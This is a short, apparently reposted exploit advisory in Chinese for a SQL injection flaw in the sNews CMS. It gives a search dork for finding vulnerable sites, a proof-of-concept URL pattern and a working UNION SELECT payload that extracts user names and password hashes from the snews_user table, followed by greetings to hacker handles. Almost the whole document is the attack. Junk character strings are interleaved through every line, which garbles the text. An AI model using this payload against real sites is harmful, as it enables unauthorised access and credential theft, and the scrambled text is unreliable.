标题: CMS snews SQL Injection Vulnerability
" s e( V0 {$ a4 D作者: By onestree
R+ A+ c8 {6 q* _8 f下载地址 : http://snewscms.com/* {# h$ _1 [& E; P; P: f: a4 Y
测试平台 : ubuntu 12.10 / win 7* n; p8 y q. ~9 f: F7 p8 W
关键词: inurl:"tanyakan pada rumput yang bergoyang". x+ P$ s4 A: P2 G ^$ j! L
3 V' h' c8 |1 J
; p# B$ p5 e# v* ]' E3 E8 ~& K*************************************************************
& h; w) S! |" U4 C5 n, B
2 F3 s9 b9 S% FSQL poc:2 T' y! e( i p/ @2 e
F5 ~( [) _, R5 Lhttp://www.2cto.com /snews/snews.php?act=shownews&id=[SQL]
2 {( R1 c6 }$ _, {$ h6 G- j! q
/ D4 F, O/ v+ l( U3 I7 t示例3 F' s V9 G5 T% H' R
- Z4 K3 t) Z; A/ g8 h
http://localhost/snews/snews.php?act=shownews&id=-23/**/union/**/select/**/0,1,concat(user_name,char(32),user_pass),3,4,5,6/**/from/**/snews_user/**/where/**/id%20like%201/*# v5 D# K3 b B, L1 }: F$ W
& Y$ _9 q& P# l. W$ o5 N1 H w7 B P
2 t" q7 K* R; z# }$ V致谢:9 ]: P. K+ T' k- ~' X
$ t; G8 O6 C" I0 h4 ~ Exploit-db | Alex_Ownz | alm.teardrop | abhelink | kalong666 | prorebell6 {+ ?, Z x9 n* W# H6 g
% s! N! ~6 q. q0 `" {" P) M indonesiancoder - moeslimh4x0r - go-coder
: x8 K h+ Q+ {7 Z% f ! k1 {& M% q/ k& S5 o' B0 X
spesial my hunny :*8 X/ |6 {+ [1 v/ P+ V d" @
|